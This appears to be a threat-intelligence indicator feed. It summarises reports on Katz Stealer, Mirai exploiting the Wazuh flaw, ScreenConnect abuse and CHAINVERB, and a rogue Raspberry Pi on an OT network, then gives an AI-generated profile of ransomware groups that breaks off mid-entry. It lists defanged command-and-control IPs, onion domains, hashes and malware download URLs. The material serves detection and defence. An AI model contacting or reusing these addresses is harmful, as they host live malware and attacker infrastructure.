sha256=1367dcf619cb935dc08d349fc18d3f9726cfceff151f4d57beff45591712189c, - sha256=062c0a5c8f484bc975b3e5490718cc5c7f732f7f53ce35d81e94cd83c273f78b, - sha256=2bd6b5cbeddab8b01e14ed4c073afdbd4316340aada77e3e55ba5e1af21652f7, - sha256=6bd191586c52ecd2a3496616838753db21156d52854a99b7d3fcbf9be0a5184a, - sha256=1c6c79b07e45630debe31362e4c89ffab3560c4712470f7af891bb31539d153a, - sha256=e9b0cc2118a7a07709b56f7358c07f4a2959f81c87da5f565fa08382768fac8b, - sha256=e145db8668b15278cc55b723df9f296103ef2ea3511d90e2bbb2ffa5291d4ae4, - sha256=0d44ff778dbecf8d951c54c199bd35ba0fe5ac817d5ef61b2fe998dfdb794560, - sha256=6fdeb1c2f4b5bc4ff6ea9635ca72d8670c07cfd17d3b7779caee22b96727f732, - sha256=34f50a5215c544cbd2ce67bcbf89cf2aee798c56cfb9e225e57e8c8270021210, - sha256=494460a17bec58d47212c907e7e7706dc80e99b27a022558637caebc2867e574, - sha256=11464f7ac40e3e5f771dfe19aee3b3d21cf526a11429038ba9de4c9d7e4bb42a, - sha256=bfc1064d3624c7bc68ef6b8ce2b0f40229d5981472c8b443c58f38bf3f461b2a, - sha256=2fd9e14830bbeef24fdff29a850a6164af4c4722d742185e022df9106029b587, - sha256=3f4b5b22b53f2fdeb7a82c94ac4d846f1e4ac0e9d055020f2f063598025b4674, - sha256=f10bd5443148d47fbf7c6a6998651eb9bda4c7c9213f9e5a65a76e98637cb748, - sha256=881a84477b509e2e63b70915055b9af1d12cf8fde9fb5031823c8c2a38c8979a, - sha256=4b268cfbdb86017f6271f09eb2aa54334de24d0ed12cfeb26fbb3dd8e104a8d3, - sha256=8d8d21f2c28f3e44b7253583e04d11cf7e7453dab139c187201f80e70d89b579, - sha256=8684e74d35baab30e8f8af7db486c2a339d3063feb2074109b8c96c1fea8313e, - sha256=6053d67835d2925c52263bdb9e4d7475e1015ea9cc4c8f994cfa7e0dbdb7e27f, - sha256=52ef3b610426343314e6c0f238e4460f0dffedbd022d33cb8f8e78e980d604e0, - sha256=50b102938d29cc7f61c67da6981545c69f70c7178d009ec1999ee0ddfe81ebba, - sha256=974285914961125d2963435c3dbe49b882cd88d95563b1ae3a62cd6240618c16, - sha256=a309753efca5242bbc9ca0e54a381ef2bac6625a0f591d79f8525e1ec196be4e, - sha256=1ec930716999f6a80a4f32624d8f907f2c7887e15b1c518d22f4aefe49367bba, - sha256=c902a206da5c3e1a4b8b8ba9f0e63f314e8cadcf044c25f729176b29c19bcbbb, - sha256=8515d46da83fb649db969b2acca47cd10f232174af358560210b362a56594fd1, - sha256=908ef89767bcd583edb96a8c12f3046b9db522cc7310e2c20799881d7bf75f9d, - sha256=da43703c733a1b0af183fdb61877b5c15651c21ffcc3a49c6addc83d76c10329, - sha256=91c2fbc594469839ad062e7cf359f2451fe8a14f041d8afe515ceab800c35133, - sha256=fbe1970d89b8546cd57522bf479e8be08fec4f3df9bdf79d0f3436250ce38379, - sha256=76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358, - sha256=e4fff1e153ef46a29865f28df724e7a3246809d9ae75a7546b580938acbbcb73, - sha256=184a400fe334027ff287ad0cf83c165fdf4605507c83ec054fb2b544f877163c, - sha256=ee6a58d1e3ce4f2e7fac7bb3c1f1c24836bcc79f456035aede52b7d14a7de77f, - sha256=1d17937f2141570de62b437ff6bf09b1b58cfdb13ff02ed6592e077e2d368252, - sha256=890cf9827361add4c2a6e5b93f7f9ccc9bb2f555e0cd535de144203f7156a959, - sha256=3869340562136d1d8f11c304f207120f9b497e0a430ca1a04c0964eb5b70f277, - sha256=bdd89826ab8d3e3c03833b1ea8e4b0a34c80f13bfa5882e5b82f896cec41d141, - sha256=c3dc66c657dd5a8a624c6eba67a6b8d1dada8ceeb13aab169c3a88c615831560, - sha256=ae4db4f97700aab607368a4d3a489215b2ddb5af60004b8da6e5b0c0220c2c25, - sha256=94bb5b8cc0a2d01d4f65294c816299b97dd38bc7be8fc9089dc90cc969995528, - sha256=8b7be1efcddddc3a29ae0514a6ae758e7f86be193ffe380e5e1e38dc22affb38, - sha256=e300c44b45b07f3766586e500f4f3596c23ffd80171eaa5334bb4db3e8d027e0, - sha256=41c671332b58f92187e32771ed1ba86c1ed256e36f036f74c91cf1aa7db07bc2, - sha256=f015da1f2ada32f734b81aa282bea62840cd84afaa353ca52d5e2d0c82e705d1, - sha256=c2f1c765b03b4ae0c08455c2b5e917ba8564ad945c3580a1e622169aad67807a, - sha256=f4f02429e8e1e966203d69610c31ae94ad4d34de10efd5edc4669ce067c4de4f, - sha256=3bdaa78077bd71e40b62ec2d6797c027f0b8deba9c3a7de9eb22823ad05c8201, - sha256=4d03c2a47265eab0c87006a4a2965fcf394fbdabb8e86cbe16b36376d04b8143, - sha256=50a5e6a357c841e6c2058ee658c70756da4b803f2a4f6d2cf96ab882a03a5294, - sha256=809b54b0f6092cad1a764872acb9a31ed99792589b84cdb279b4b1d15e8ec8e2, - sha256=de5f6cc6a3eaee870f438a43e1e262283124aa1cfa11ad395a05c4bff026c09f, - sha256=809050c6f29e80e9d0918060634df601ae12b27cc50439f4c123b6301ce26043, - sha256=1e54b2e6558e2c92df73da65cd90b462dcafa1e6dcc311336b1543c68d3e82bc, - sha256=2ba527fb8e31cb209df8d1890a63cda9cd4433aa0b841ed8b86fa801aff4ccbd, - sha256=9953bbe13394bc6cd88fd0d13ceff771553e3a63ff84dc20960b67b4b9c9e48e, - sha256=4d0663cff0c5c3f29c81e9aefd37f16a318ff638986ecc60e9bce6c90b72606b, - sha256=0e71728e5e6a762923fc0372e2047e0d969bcc5efbf4f3010df2ff6576cab725, - sha256=ebfdea1721914a504465ea474edc3f823c3e13fc71c86f04f4793c61e5070d92, - sha256=2938261c867331e12e7cff9ee28366f3986986108eeb00507db74cf0d7b6aad2, - sha256=c220f9ba0ee8445ab6d36f19d7cf24fd6df72eea41b9ba40f585451ee24c0f6d, - sha256=9a4e39fcb4033a9c849890085b67faea7265eaf56744e77aa8180b1834b7e14a, - sha256=d0add7a41b8c78ab0134752665278b9544d417b244a788c620c5da5215b515c0, - sha256=5072735b87e62c0239099fcd3d74a677e1b4c6497e0b17ed8ea4c83778c13039, - sha256=aadf323d8052da80c761ab9d05717603804405ee33e624926009a30d857d6d1a, - sha256=36b79a3eca6d0ee23daf10c436f4ec5c8c279fbfd79c965c7e37515c148c3c5b, - sha256=401c5d2157d303df1ca465ff4097ee4474574c39f614cbb5734193a3917354c0, - sha256=4665c7b360b18496be00246eb3bc886e83b22028e95156101bf73bf0c48dddd3, - sha256=056451b28c4bfe6bf1536c1d67b33f312a06c656cd3c633f40cc5f5b85c6528b, - sha256=6b999462e434b258980b1532f5d0c3661646f7bb9567aecdd748f6be10dcb740, - sha256=0c8b9fa67d1d149636b560a2ec8f9c50cd41ebf11f5691cf2ea39f1d057f8ff1, - sha256=0c8d22d58a747ceccad56317b9c0afe58fe4b9f3c2138134e978e43a5f5ac390, - sha256=e2c283438e5f9236c5cb2e6b8b95ca78d520f7b776d64a050664972cb51076f5, - sha256=a5febb4b5ba6572594de87d2a9de6df65d49da755385bf3d3d4d054772ce493c, - sha256=c3ecbc6023bfa170c31eaf7033b68495798e305111ca9f2f203f58b9ec942384, - sha256=8246ba12e1ebfcdbaed80a7ba1ec65423f23b9b7820c0dfb07ee38baa83d6a20, - sha256=1f38a9e17e5096bca84b6ec87eb5470b2ce4450a6a03b3e41b38dbd91ab281da, - sha256=e9010ab2a031125f12225d8b1f19ac65bc03b87332dc5caa35028a577b9ca0fe, - sha256=f4052e52fed661fd05ea39a5187781ec6c234c5d7ea4ab91cd77f2e1d2c709b5, - sha256=5e9362dba53021ab588e396e1cb28100718471f07c5dd5cafa6bf5728f014b97, - sha256=13265c0e32312a0763f3f8fed0f017a606355987ac9398bfb38f47c760ad32b0, - sha256=41be156c27dad780dd96493319dbd89228616573ec7d731ca2e642ee0e554af3, - sha256=58cb66268b58d7ca77fb5f5df668ffa76a23854a6267914fc3973dbf92394612, - sha256=8d5d4e48ce623085efec9a56981b0ab74f1180f3b42614df88f11da543f2849a, - sha256=c5fa7fd1ff45c5cfaec851795f4c2e15326046f3022778bdf6f37b7b1dd75f5c, - sha256=c6e672b832dcf78490ea8d128f5f8a647274b9b98d851bc36ff07b2d3a0d7ba3, - sha256=191a8766da98b1f992072045905cf82c771d8cb9f697d08873686778dc70c7f6, - sha256=982ec3915d458007e960a4dbe0c9c914825fd88c1739ab3f7edfebaaa10bc265, - sha256=710e80fb64e08f20ab58c20ccdbc966f6e3b54511775e8ed99ff0bcf51690227, - sha256=4814ea15da1826d9ef400c3e607ca87d11b18b8a1b4f43f13afa93467429dfb8, - sha256=952cac8ec226b4ed38a2631c220bb80409edbc0c9a0ac2793b879a259172282b, - sha256=f491d8b510ee283d24d40aa5233743d8cf834a164d0f681af8870dd1f35b734c, - sha256=a67d73996a5479312f4a4ea4fccdde293695359aa6b6da06c01248066a7131f9, - sha256=194d739fa93970d63dade70aae7c3b9ac8a6938be9f0e2d470d3adf8c106bfad, - sha256=3c6dacad931bf24eb953858c0bb3e49fe821d111d9003c9fffcb814ae6e8edf8, - sha256=65b601f8154bddd42cb31ce166697335e79f2e713655865bee66654c51e7c1dc, - sha256=b417396efb07943d380182d610da313607308a74fc0dc77318407a5248cbab6e, - sha256=81e6adebca376dfbda0484ab4475d0ac76a1e86afe0930e45ab7137cfd378d38email: kasalboov@web[.]de, ilya_b@hip-hosting[.]comTitle: Understanding Katz Stealer Malware and Its Credential Theft CapabilitiesLink: https://www.picussecurity.com/resource/blog/understanding-katz-stealer-malware-and-its-credential-theft-capabilitiesSummary: Katz Stealer is a sophisticated information-stealing malware-as-a-service that emerged in 2025, known for aggressive credential theft and stealthy operational methods. It is primarily distributed via phishing campaigns and counterfeit software downloads, featuring a modular payload that enables rapid data exfiltration. The infection process begins with a JavaScript dropper that initiates a PowerShell script, which then downloads a disguised payload. Katz Stealer employs advanced evasion tactics, including a UAC bypass and process hollowing, to maintain persistence and operate under elevated permissions while extracting sensitive information from web browsers and cryptocurrency applications. The malware establishes persistent communication with its command-and-control server to facilitate real-time data theft and employs unique indicators of compromise to highlight its presence within compromised systems.Threats: katz_stealer uac_bypass_technique process_hollowing_technique chromekatz_tool dll_injection_technique credential_dumping_techniqueIndicators of compromise:-------------------------ip: 185[.]107[.]74[.]40, 31[.]177[.]109[.]39domain: twist2katz[.]com, pub-ce02802067934e0eb072f69bf6427bf6[.]r2[.]dev, katz-stealer[.]com, katzstealer[.]comurl: https://archive[.]org/download/new_image_20250413/new_image[.]jpghash: - sha256=22af84327cb8ecafa44b51e9499238ca2798cec38c2076b702c60c72505329cb, - sha256=e4249cf9557799e8123e0b21b6a4be5ab8b67d56dc5bfad34a1d4e76f7fd2b19, - sha256=fb2b9163e8edf104b603030cff2dc62fe23d8f158dd90ea483642fce2ceda027, - sha256=0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7, - sha256=4f12c5dca2099492d0c0cd22edef841cbe8360af9be2d8e9b57c2f83d401c1a7, - sha256=6dc8e99da68b703e86fa90a8794add87614f254f804a8d5d65927e0676107a9d, - sha256=e73f6e1f6c28469e14a88a633aef1bc502d2dbb1d4d2dfcaaef7409b8ce6dc99, - sha256=2798bf4fd8e2bc591f656fa107bd871451574d543882ddec3020417964d2faa9, - sha256=e345d793477abbecc2c455c8c76a925c0dfe99ec4c65b7c353e8a8c8b14da2b6email:Title: Two Botnets, One Flaw: Mirai Spreads Through Wazuh VulnerabilityLink: https://www.akamai.com/blog/security-research/2025/jun/botnets-flaw-mirai-spreads-through-wazuh-vulnerabilitySummary: The remote code execution vulnerability CVE-2025-24016 in Wazuh servers has been actively exploited by two botnets distributing variants of Mirai malware. Disclosed in February 2025, this critical vulnerability allows attackers to execute arbitrary code through malicious JSON files uploaded via decentralized API requests, with exploitation attempts first identified by the Akamai Security Intelligence and Response Team in March 2025. The first botnet, "Resbot," targets Italian-speaking users, leveraging the vulnerability to execute a malicious shell script that deploys the "morte" Mirai payload, while the second botnet began its operations in May 2025 with similar tactics, utilizing the service to spread the "resgod" variant, also aimed at IoT devices and showing scanning behavior for FTP and Telnet vulnerabilities.Threats: mirai resbot_botnet vega_lockerIndicators of compromise:-------------------------ip: 176[.]65[.]134[.]62, 176[.]65[.]142[.]252, 209[.]141[.]34[.]106, 65[.]222[.]202[.]53, 196[.]251[.]86[.]49, 104[.]168[.]101[.]27, 176[.]65[.]142[.]137, 104[.]168[.]101[.]23, 79[.]124[.]40[.]46, 194[.]195[.]90[.]179domain: nuklearcnc[.]duckdns[.]org, cbot[.]galaxias[.]cc, neon[.]galaxias[.]cc, pangacnc[.]com, jimmyudp-raw[.]xyz, gestisciweb[.]com, resbot[.]online, versioneonline[.]com, web-app-on[.]com, assicurati-con-linear[.]online, webdiskwebdisk[.]webprocediweb[.]com, continueoraweb[.]com, ora-0-web[.]com, multi-canale[.]com, eversioneweb[.]comurl: http://176[.]65[.]134[.]62/w[.]sh, http://104[.]168[.]101[.]27/sh, http://176[.]65[.]134[.]62/bins/morte[.]arm, http://176[.]65[.]134[.]62/bins/morte[.]arm5, http://176[.]65[.]134[.]62/bins/morte[.]arm6, http://176[.]65[.]134[.]62/bins/morte[.]arm7, http://176[.]65[.]134[.]62/bins/morte[.]i686, http://176[.]65[.]134[.]62/bins/morte[.]m68k, http://176[.]65[.]134[.]62/bins/morte[.]mips, http://176[.]65[.]134[.]62/bins/morte[.]mpsl, http://176[.]65[.]134[.]62/bins/morte[.]ppc, http://176[.]65[.]134[.]62/bins/morte[.]sh4, http://176[.]65[.]134[.]62/bins/morte[.]spc, http://176[.]65[.]134[.]62/bins/morte[.]x86, http://176[.]65[.]134[.]62/bins/morte[.]x64, http://176[.]65[.]134[.]62, http://209[.]141[.]34[.]106, http://104[.]168[.]101[.]27/resgod[.]mipshash: - sha256=dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9, - sha256=7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549, - sha256=64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f, - sha256=4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed, - sha256=811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc, - sha256=90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353, - sha256=8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6, - sha256=c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1, - sha256=6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a, - sha256=9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b, - sha256=be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0, - sha256=e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0, - sha256=4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6, - sha256=a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc, - sha256=941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549email:Title: ConnectWise ScreenConnect Attacks: Continued Surge in RMM Tool AbuseLink: https://www.cyberproof.com/blog/connectwise-screenconnect-attacks-continued-surge-in-rmm-tool-abuse/Summary: On February 13, 2024, a serious vulnerability in ConnectWise ScreenConnect versions 23.9.7 and earlier was identified by an independent researcher via the ConnectWise vulnerability disclosure program. This vulnerability was later linked to cyber incidents in May 2025, involving the CHAINVERB backdoor used by the UNC5952 threat group, which employed malicious droppers in phishing campaigns targeting global financial institutions. CHAINVERB, operating as a downloader, exploited digital signatures in Windows executables and utilized concealed command-and-control URLs within its digital certificates to execute further payloads. Investigations revealed that the attackers conducted targeted operations using phishing emails with malicious PDFs to distribute trojanized executables signed by ConnectWise, indicating a coordinated threat to the financial sector.Threats: screenconnect_tool chainverb unc5952_group spear-phishing_techniqueIndicators of compromise:-------------------------ip: 176[.]123[.]10[.]175domain: yertoje[.]uzhelp[.]top, polarof[.]koyhelp[.]top, www[.]v4shelp[.]top, helpw8[.]top, web[.]bcqhelp[.]top, web[.]mryhelp[.]topurl: https://visionary-clafoutis-308e89[.]netlify[.]apphash: - md5=a01a80d8c1f665eda5a81391a1ed0024, - sha1=b1568b6001450646e2526f6836ca77cb8b3fc7e0, - sha256=d6d75807c23ebfb34eceaa10037f2a911dd50128135cb968811c50b0f1d69eea, - md5=b552a9a824d10d0b8385005cba442544, - md5=180f9294e3e2418a460dee6d9e40291a, - md5=f2ba4c8023add555f68732460dc9d4c7, - md5=cc9b850b23700158b2b3d14cc45135eb, - md5=ca80f7198ca049c40a8b32d0c317595f, - md5=5cb2a3602f1056a8fba8072fbf80561a, - md5=296d63f69293f56fb1ffafeae04a756f, - md5=b05f9798620028f6f88a04c672bfdba2, - md5=848db3f9ccbcd65aa0ff91da10d6ac22, - md5=77e093ff9a44fe0266d5e1b736683efe, - md5=3ba3a33626207a86999baeb188747d5a, - md5=a493cf8de03552a775f738d77ad6e457, - md5=2947efb92b290724c7b3b61b7d2a0195, - md5=3e7f5c2ab812e00d0a2a443f7aa5eb90, - md5=d8ff63a61f6d8c3379b4c64eb624d6b7, - md5=b64d3d38de70cade9b423e87c571a65c, - md5=11099bafe8fb1dac645f72e9a993cb0a, - md5=99ee3de2e32f7a05df15738023304bc5, - md5=87648c0d0f9a255a22274249948a11a0, - md5=85e12111e6913b3cd30f1f21caba1462, - md5=50afa07549676ea22c0e27f6aa583af0, - md5=0f249172ac7501af462248588daaab50, - md5=6048ce6db60de443e7b98c41f16c6952, - md5=b273d861bfb4f8daabe143c7a74de547, - md5=6b32ce8781e54e27c1fe42f0d2bdbe0e, - md5=aa251635e7e97d9276a93ceabbacdbb1, - md5=054c9912afa050b56082ca8584ced948, - md5=71af888e3467c69e45b98f95aeafe68e, - md5=bf382d8b554244e70a7e13ac363365a1, - md5=b049c27324c3a01311f20d5db294817f, - md5=64d4977383bc99c6832e5e015a46889f, - md5=5cd0afa3d3bb5226e84b274175d8178b, - md5=47208e7f253f38e574fa150794fa5890, - md5=3bf8b746e02db924c6af2220b531d1b2, - md5=4b127db25684359a302c55f49db5c708, - md5=3ce16e7fc2da4be70a72e7e48609f67a, - md5=d4bf0c9b291e039178495b432943cdbf, - md5=e3b3aa27254565637b0b1a1fe2faed3b, - md5=db4879df2426ca0cc100f7a72fc3418e, - md5=2bc2cd08e21bef440ec6c83eb0068442, - md5=25e1336f22b27b3cb5d7bc91abdd1a9a, - md5=dc531753ba238d56549445ea7d1a5ca1, - md5=7ffdbd968f6e1db7eae9e058ac79e9bd, - md5=de4c6b36cf1b707eed2b3b3c5dd2e718, - md5=dfd4f7657cf7cea7ba272c1b791cd5a0, - md5=7203f98c19dd4859488b688fc775a8ef, - md5=fbe9e18d77342dcac9eeae4977ffb3c6, - md5=893bb4521b75b301cfb7b3106c055c12, - md5=8623e275f3a769bc2528fdc39728e244, - md5=49c5a54f2864bf3e0cdb9343d897acda, - md5=da8e03697343af47fc7e29ed56d4663c, - md5=fd8c225bcdf57c6f0fb5c6f111b47ef5, - md5=ea7164cf3ef1b9037d7bcfae09f23aa3, - md5=de2de1eb68b066c0e69921f51234d40a, - md5=715a252cea21f0d4f4ae7f0723baf625, - md5=f03a90f320c3677ba1b3e16ea64b3f49, - md5=d0f76accd3c94906fb2b66cab84d96f8, - md5=4c096113de849cda645135fa7b3bb5ca, - md5=07c8988b88d404b1dee9adf977255a44, - md5=2675cc6b4f9698befbcb508cd32178a1, - md5=288c8506e0c8784e8285cedc877d1170, - md5=a66f45a7d2d065ba375adfd790ebcbc4, - md5=1d02925bc24b0edc1b0603c45e93a696, - md5=c5a85316c07b6e7088c2c409f1febf22, - md5=b07b433cddb3f795331c3f27dd8aa189, - md5=6ebed61e44202aedc4d1ba58c16d4c5d, - md5=4cbe999b7105a8111bef31df5e103fc1, - md5=421e764a03c725bf64008e60ddb15a84, - md5=1448b06d2157f1dbe4e8f449f737214a, - md5=4556288adc268b13695ffddb58ad329d, - md5=7086c4d6d0e0196f08afb9cf8c80e0a8, - md5=1c60490885081a0782380118f5e36e58, - md5=69f3c1b39b1717297b8af0b324fa37fb, - md5=1796319d7ff9d14843f56d1dc15c79a3, - md5=1967d49246e5d1dbfa3fb4271ca353b1, - md5=5b2f84d6b552ca9bd0351df357158ea5, - md5=0173c335860852cb6145f14500abb149, - md5=1984543d91123d8c869bdd42b929f015, - md5=3ca077d1b43e2fd567d3e49490f86d5b, - md5=f92cd489de2b5d82b4c3998b40cb3df8, - md5=726c1741ef33c9b0dfdfb1d8e53ce0fa, - md5=d8d0cac5170380585f806b897cd14b9d, - md5=d33b15e2850f533af9e46c7846d4bcc5, - md5=bf07d7a18fc32261c0a536919fed5e69, - md5=46310732752848582065e901f5a6a233, - md5=89cd5cbe803b8d4b0f27c9750a7f9a04, - md5=08cf33bd7d34ef0c49b17bd53e5ee83c, - md5=fca6d5ce3fe97f21615cbe08d688b2ac, - md5=60224f437f45761c083fe11c2d88b0d7, - md5=357e4a0b14e8c481008e79df870ff729, - md5=3796ab8db2ca9dc884a591a69b3715d4, - md5=333dddd525c3910a319b363f77d0bc39, - md5=7565cb88cae52972604d22a729e7a693, - md5=91444bd4b6bc087ea1fff367fe029749, - md5=7d6a0116622f6f519f607ba0a9e7add4, - md5=ebc8e0604ae3b66aac419d6b309574db, - md5=f86462bae226b4f9c65f83f224621af6, - md5=c4cb22e51ecdce8b1b9398b96c89171c, - md5=e2e1b95b55dd0d7fc5f983b4d518db0b, - md5=18335fefbc5885cfc42df41ebc4ef31b, - md5=9d5a9f7b2eafc725c2c2f8f3b55ca17e, - md5=684a68dc8e1f5929906ea5f5fee005b4, - md5=2254eca6a943144866f648514e3ed8c1, - md5=2ee07292c98fa68c37775a3e8f1aa9ae, - md5=4619beab0955d17c69b6a03d725cab26, - md5=4a5f9323e22265ba5572b40a0bcf9e60, - md5=b8e1fc27a3a78c6ec296f1060702bd35, - md5=f32535d6fd244010c2c03f3015efb386, - md5=5d5cc5d15a2186ca442a0d865d2c6c6d, - md5=fc52076dceba92f778e3ddfc779b82e4, - md5=a87b746ce6e4eb54300fdccd2ecd653f, - md5=4c878ac8a33ce5201e2a25abd081a8d0, - md5=485ce9a3df08af7369b5ad055f3d1a99, - md5=93ee0c45cf836ff300145bd069ba9107, - md5=bccb4b2ab4b27ff1c632533e0584cf79, - md5=dd602d27f47c1c3f5c597960db8c1a51, - md5=186216fc1e1327ab007aedd8188231e7, - md5=f1c1ac1c5cbc3bc1ac1b8e03440086e2, - md5=d60a9a14c3fc5bc24b1e0f8638bcfb51, - md5=f62e18c391a571d5b293c4cf7d220543, - md5=79699e683b1f5db921656ffb0f0d8c1e, - md5=89f68ff5e4965218126f8e616a7a7798, - md5=99f9f82711ec2c53ef7ff114b80ebb76, - md5=b8e48661ea97a690308d8987625cbf48, - md5=7b3f4d34b8d3518c092d81506df05103, - md5=7c0b9116ad3584b3104a54281bcff793, - md5=51976d5a76b203b25bbc514d6129de9c, - md5=9fb707a0ab4259078495c94bb6b6a2e9, - md5=42c0a87246ee89b37c0e7846e07627e5, - md5=690fbe64c5cf40f4e43ec4d2193e66b0, - md5=73f9ecfae60b17cb6331b0800bd0c16f, - md5=06705be1357579f491aa5abb67aca22c, - md5=d714cea27c300d0b2789098763a884ab, - md5=32c7b6a978b2c5c19a983d50fd52c0f7, - md5=7af30ba52976fec95c0fd86691a7329f, - md5=cebeb96d7e2d36264fb6f50570051ee8, - md5=3d70e84758aef8a192f95e4e092cb769, - md5=8efcb17298c5af05639f85e042f5f69c, - md5=f2896464e2c3389ad4c98eccb19f9acd, - md5=e9ea1026cf176f4d497a27d0c856bedf, - md5=8542228028211206428187271d831981, - md5=b7386ff0ad31f28448c4704d30b5cfeb, - md5=be2ad88838969e92010fab7d958ee0f2, - md5=d32ad97efa23f8ad4269a5e59589703b, - md5=a050291d555cf05c1b5fd6049ff85c8c, - md5=68320761a01f9df5f1bdc71c94326311, - md5=d983cebe16603091c83e39b5f4eb266d, - md5=a1afebafe5a7598cef0ef8f348d49996, - md5=18fbd1aec9f66d3b92a2d89f81bcc929, - md5=b28bf1217eaab7dc2281beacf8c00f6a, - md5=d1f2de5b461f3344f4274806c4ff1ac1, - md5=bbcb31367235ceb97549bf432587d6f2, - md5=3f7cc1cb3da89b1ad57bc35bc73d54a9, - md5=ef3c98feca4c88c14c78e890ecdd705e, - md5=00f7c19a8494bfa0d734648d18c464df, - md5=a9bfee1aa5068c03ce1b4580698f000a, - md5=781add1dd969276ba231c975ccc7a15f, - md5=54d42f80e8e09f1568f335be20393cb5, - md5=1ee9703849ab4d406c9c57e35a0c211femail: russ@oshlaw[.]comTitle: Proactive OT security: Lessons on supply chain risk management from a rogue Raspberry PiLink: https://www.darktrace.com/blog/proactive-ot-security-lessons-on-supply-chain-risk-management-from-a-rogue-raspberry-piSummary: A recent insider threat was identified when a vendor left a rogue Raspberry Pi device on a customer's Industrial Control Systems (ICS) network, highlighting supply chain vulnerabilities. Historical incidents, including the 2014 Havex attack and the 2018 semiconductor breach, exemplify the risks associated with compromised software within ICS environments. Darktrace's analysis pointed out unusual metadata linked to the device's encrypted connections, indicating potential risks despite lacking overt malicious signs. Additionally, advanced techniques like ClickFix baiting have been employed by threat actors such as APT28 and MuddyWater, utilizing social engineering to execute malicious commands and allowing for lateral movement within networks, thereby increasing the potential for sensitive data exfiltration.Threats: supply_chain_technique watering_hole_technique havex_rat teamviewer_tool lolbin_technique mitm_technique clickfix_technique aitm_technique fancy_bear_group muddywater_group spear-phishing_technique fakecaptcha_technique xworm_rat lumma_stealer asyncratIndicators of compromise:-------------------------ip: 212[.]237[.]217[.]182, 193[.]36[.]38[.]237, 188[.]34[.]195[.]44, 138[.]199[.]156[.]22, 185[.]250[.]151[.]155, 64[.]94[.]84[.]217, 94[.]181[.]229[.]250, 216[.]245[.]184[.]181, 168[.]119[.]96[.]41, 205[.]196[.]186[.]70domain: rkuagqnmnypetvf[.]top, tlgrm-redirect[.]icu, diagnostics[.]medgenome[.]comurl: hash: - sha256=34ff2f72c191434ce5f20ebc1a7e823794ac69bba9df70721829d66e7196b044, - sha1=10a5eab3eef36e75bd3139fe3a3c760f54be33e3email:This article was generated with the assistance of an artificial intelligence language model, ChatGPT.
Analysis Summary
The provided article is a weekly threat intelligence summary that compiles findings across multiple independent reports concerning various actors and themes. It does not focus on a single threat actor, but rather describes the shifting tactics of several distinct groups.
Below is a structured summary covering all actors mentioned contextually within the provided snippets:
***
# Threat Actor: FunkSec
## Attribution & Identity
Hacktivist group that has transitioned into offering Ransomware-as-a-Service (RaaS).
## Activity Summary
Shifted focus from political activism to financially motivated cybercrime, specifically operating a RaaS model. They have claimed at least 172 victims.
## Tactics, Techniques & Procedures
- Leveraging generative AI for rapid victim acquisition.
- Ransomware operations (implying encryption/extortion).
## Targeting
- **Sectors:** Not explicitly detailed, but implied to be diverse due to RaaS model.
- **Geography:** Not specified.
- **Victims:** At least 172 victims claimed.
## Tools & Infrastructure
- **Malware families used:** Implied RaaS payload.
- **Infrastructure (C2, domains, IPs):**
- Domains: `funksec53xh7j5t6ysgwnaidj5vkh3aqajanplix533kwxdz3qrwugid[.]onion`, `funksec7vgdojepkipvhfpul3bvsxzyxn66ogp7q4pptvujxtpyjttad[.]onion`, `funksecsekgasgjqlzzkmcnutrrrafavpszijoilbd6z3dkbzvqu43id[.]onion`
- URLs: `http://funksec[.]top`, `http://funk4ph7igelwpgadmus4n4moyhh22cib723hllneen7g2qkklml4sqd[.]onion`, `http://pdcizqzjitsgfcgqeyhuee5u6uki6zy5slzioinlhx6xjnsw25irdgqd[.]onion`, `http://ks5424y3wpr5zlug5c7i6svvxweinhbdcqcfnptkfcutrncfazzgz5id[.]onion`
## Implications
Represents the trend of hacktivist groups prioritizing financial gain over ideology, posing a significant RaaS threat.
## Mitigations
Defend against AI-augmented targeting and monitor for indicators associated with their known infrastructure.
***
# Threat Actor: KillSec
## Attribution & Identity
Cyber group aligning with the "Russian cyber realm."
## Activity Summary
Adopting customizable ransomware solutions and implementing double extortion tactics for increased monetization.
## Tactics, Techniques & Procedures
- Ransomware deployment.
- Double extortion tactics.
## Targeting
- **Sectors, Geography, Victims:** Not specified beyond general alignment with Russian-related cyber activity.
## Tools & Infrastructure
- **Malware families used:** Customizable ransomware solutions.
- **Infrastructure (C2, domains, IPs):** Not detailed in the summary snippet.
## Implications
Shows actors exploiting adaptable ransomware frameworks to maximize illicit profits.
## Mitigations
Implement robust defenses against evolving ransomware strains utilizing double extortion.
***
# Threat Actor: GhostSec
## Attribution & Identity
Initially rooted in hacktivism; maintains political motivations but collaborates with cybercriminals for funding. Associated with the `ghost_algeria_group`.
## Activity Summary
Forged partnerships with cybercriminals, launched its own RaaS offering named GhostLocker, and is noted for returning to political motivations after securing funding via cybercrime.
## Tactics, Techniques & Procedures
- Partnership with traditional cybercriminals.
- Ransomware operations (GhostLocker RaaS).
## Targeting
- **Sectors, Geography, Victims:** Not specified.
## Tools & Infrastructure
- **Malware families used:** GhostLocker.
- **Infrastructure (C2, domains, IPs):** Not detailed in the summary snippet.
## Implications
Illustrates the blending of hacktivist identity with professional cybercrime infrastructure for sustainable operations.
## Mitigations
Monitor for collaborative activity between ideologically motivated and financially driven threat actors.
***
# Threat Actor: Librarian Ghouls (aka "Rare Werewolf" or "Rezet")
